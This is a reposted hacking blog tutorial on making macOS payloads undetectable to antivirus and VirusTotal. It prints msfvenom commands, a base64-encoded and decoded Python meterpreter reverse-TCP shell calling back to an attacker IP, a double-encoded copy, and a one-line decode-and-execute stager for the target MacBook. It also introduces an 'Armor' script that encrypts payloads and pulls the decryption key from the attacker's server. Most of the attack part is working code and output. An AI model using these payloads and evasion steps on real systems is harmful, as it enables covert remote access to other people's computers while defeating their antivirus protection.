Nov 14, 2018
83 Views
0 0

How to Create an Undetectable Payload – Hack macOS Like Pro

Written by
Encrypting payloads and encoding stagers are more effective against macOS than one might think. Plus, it’s very easy to evade VirusTotal and macOS antivirus software using a few simple tricks.The goal of this project was to locate a known and easily detectable macOS payload, then find a method that allowed that very same payload to execute on the target MacBook. This would reliably confirm if any discovered evasion method was effective at executing known payloads. In addition to testing malicious files against VirusTotal, they were tested in macOS Mojave (v10.14) against popular antivirus software such as AvastAVGBitDefenderSophos, and ClamXAV.Readers shouldn’t confuse this subject matter with bypassing GateKeeper or System Integrity Protections (SIP). Executing an unsigned application and evading virus scanners are two different topics. The focus of this article will be on evading the detection of antivirus software and VirusTotal. As we’ll see below, in most cases, simply encoding a payload is enough to get around antivirus detection.
READ ALSO  What is the concept behind SQL injection? How does SQL injection work?

Base64 Encoding Basics

Encoding, as an antivirus evasion technique, is (generally) a very terrible idea as it’s easily decoded and identified. However, encoding Python and Bash scripts is common practice in projects like Empire and msfvenom. (if You are Not Familiar With MSF and empire then go back and just google it) It allows coders to execute complex scripts without worrying about escaping special characters which might cause a payload to break or fail.

Let’s talk about base64 encoding for a minute and consider the below strings.

echo 'one' | base64
b25lCg==

echo 'one two' | base64
b25lIHR3bwo=

echo 'one two three' | base64
b25lIHR3byB0aHJlZQo=

echo 'one two three four' | base64
b25lIHR3byB0aHJlZSBmb3VyCg==

echo 'one two three four five' | base64
b25lIHR3byB0aHJlZSBmb3VyIGZpdmUK

All of the strings can be easily decoded (-d in Kali, -D in macOS) using the below command.

base64 -d <<< 'b25lIHR3byB0aHJlZSBmb3VyIGZpdmUK'

Notice the end of the strings change subtly, while the beginning always appears the same. The same is true for most msfvenom payloads. If only the IP address and port number are changed, the beginning of the produced base64 encoded payloads will always be the same for every hacker and pentester using msfvenom. Below is an example created by msfvenom using the IP address “10.42.0.1.”

aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=

The below msfvenom output uses the same payload but with a different IP address of “192.168.0.2.”

aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMC4yJyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==
No matter what IP and port are used, the first 142 characters are always identical when using this msfvenom payload. If not decoded and analyzed for nefarious code, it would at least seem reasonable for antivirus software to detect common base64 strings — but they don’t.

Single Base64 Encoded Payloads

Believe it or not, finding a malicious file that VirusTotal and antivirus could detect was a challenge.  Executing the below command produced the following output.

msfvenom -p python/meterpreter/reverse_tcp LHOST=10.42.0.1 LPORT=4444

[-] No platform was selected, choosing Msf::Module::Platform::Python from the payload
[-] No arch selected, selecting arch: python from the payload
Payload size: 446 bytes
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')))

This is a base64 encoded Python one-liner designed to interact with Metasploit. Saving the one-liner to a file called “thisfileisevil.py” and uploading it to VirusTotal resulted in a 4/58 detection rate.

This detection rate is surprisingly low. Decoding the embedded base64 string clearly reveals the Python script is designed to connect to a remote server (10.42.0.1) on port 4444.

base64 -d <<< 'aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo='

import socket,struct,time
for x in range(10):
	try:
		s=socket.socket(2,socket.SOCK_STREAM)
		s.connect(('10.42.0.1',4444))
		break
	except:
		time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
	d+=s.recv(l-len(d))
exec(d,{'s':s})

Saving the above decoded Python code to a file called “thisfileisevil_without_encoding.py” and uploading it to VirusTotal resulted in the following 1/56 detection rates.

Double Base64 Encoded Payloads

If a common encoded payload is capable of evading most antivirus software, double-encoding it should be an effective technique too, right? Well, not quite. Encoding the encoded msfvenom output and uploading it to VirusTotal resulted in the following 1/54 detection.

Again, 1/54 detection by Microsoft, which doesn’t help any macOS using antivirus software. This was accomplished by first encoding the msfvenom output — the very same msfvenom payload that was previously detected.

cat thisfileisevil.py | base64

aW1wb3J0IGJhc2U2NCxzeXM7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHsyOnN0ciwzOmxhbWJkYSBi
OmJ5dGVzKGIsJ1VURi04Jyl9W3N5cy52ZXJzaW9uX2luZm9bMF1dKCdhVzF3YjNKMElITnZZMnRs
ZEN4emRISjFZM1FzZEdsdFpRcG1iM0lnZUNCcGJpQnlZVzVuWlNneE1DazZDZ2wwY25rNkNna0pj
ejF6YjJOclpYUXVjMjlqYTJWMEtESXNjMjlqYTJWMExsTlBRMHRmVTFSU1JVRk5LUW9KQ1hNdVky
OXVibVZqZENnb0p6RXdMalF5TGpBdU1TY3NORFEwTkNrcENna0pZbkpsWVdzS0NXVjRZMlZ3ZERv
S0NRbDBhVzFsTG5Oc1pXVndLRFVwQ213OWMzUnlkV04wTG5WdWNHRmpheWduUGtrbkxITXVjbVZq
ZGlnMEtTbGJNRjBLWkQxekxuSmxZM1lvYkNrS2QyaHBiR1VnYkdWdUtHUXBQR3c2Q2dsa0t6MXpM
bkpsWTNZb2JDMXNaVzRvWkNrcENtVjRaV01vWkN4N0ozTW5Pbk45S1FvPScpKSkK

It can be executed in the target MacBook with the following command.

python -c "$(printf '%s' 'ENCODED-PAYLOAD-HERE' | base64 -D)"

Here, printf and base64 are using the MacBook to decode (-D) the string and immediately executing the command (-c) with Python — which is again decoding the inner payload and creating a reverse TCP connection.

To my surprise, both VirusTotal and popular antivirus software is evaded this way. Not one tested antivirus software was able to detect a double-encoded payload in the form of a text file or an AppleScript.

Encrypted Payloads

So far, we’ve learned encoding and double-encoding payloads will evade the detection of most antivirus software (although, using raw code is better). Still, encoding scripts and payloads encourages a cat and mouse game between hackers and antivirus developers. It’s only a matter of time before someone at AVG or Avast discovers this Null Byte article and antivirus scanners start recursively decoding base64 strings and looking for common encoded signatures.

This got me thinking about a more reliable method for defeating macOS antivirus; a solution that’s a bit more difficult to detect and prevent. Encrypting the payload, in addition to encoding it, will provide a better solution to evade antivirus scanners.

Why Is Encrypting Better Than Encoding?

The primary downside to encoding is antivirus software’s ability to continuously decode base64 strings and easily discover the embedded payload. No matter how many times an attacker encodes their payload, it can be reverse engineered. By encrypting the payload, antivirus software will ultimately find a string of unreadable data. The encrypted payload can’t be scanned by AV software or read by humans — not without knowing the decryption key.

Which brings me to Armor, a simple shell script I created to illustrate how encrypting macOS payloads can be automated and executed.

How the ‘Armor’ Script Works

Armor will encrypt the contents of any file it’s given. The file can contain a one-liner, a complex Python script with hundreds of lines of code, or a post-exploitation script written in any programming language supported by macOS. The file contents are encrypted with a one-time key. The key is then temporarily hosted on the attacker’s server and downloaded by the target MacBook to decrypt the payload.

Below is an example of Armor being used with a simple Netcat payload.

There are a few things happening in this GIF. I’ll explain each step in order.A Netcat listener is started on port 4444. The “payload.txt” file is read and shown to contain a simple Bash one-liner that, when executed, will create a TCP connection between the target MacBook at the attacker’s Netcat listener. Armor is used to encrypt the bash one-liner. Ncat is used to host the decryption key on the attacker’s server. When the stager is executed in the target MacBook (not shown in the GIF), the bash one-liner is decrypted and executed without writing any data to the hard drive. Ncat immediately terminates the listener after the key has been used. When the Netcat connection is established, the attacker has remote access to the target MacBook.For a technical explanation of what the script is doing and how it executes commands without writing data to the target’s hard drive, head over to my GitHub page to view the comments. Readers interested in giving Armor a quick test run can follow along using the below steps.

Step 1Install Armor

Armor can be found on my GitHub page and cloned using the below command.

git clone https://github.com/tokyoneon/Armor

Cloning into 'Armor'...
remote: Enumerating objects: 7, done.
remote: Counting objects: 100% (7/7), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 7 (delta 0), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (7/7), done.

Change (cd) into the newly create Armor/ directory.

cd Armor/

Then, give the armor.sh script permissions to execute.

Article Tags:
· · · · · · · · · · · · ·
Article Categories:
Hack Like Pro · Hacking · Master Hack · Premium
http://techandsecurity.net

CEO & FOUNDER OF" FIVE RIVERS INCORPORATION - LEADING SOFTWARE & CYBER SECURITY DEVELOPMENT COMPANY" || CERTIFIED ETHICAL HACKER || FUTURE TRILLIONAIRE || FUTURISTIC || "DULL SCHOOL STUDENT" || (Follow this link to message me on WhatsApp: https://wa.me/13018426470)

Leave a Reply

Your email address will not be published. Required fields are marked *

Share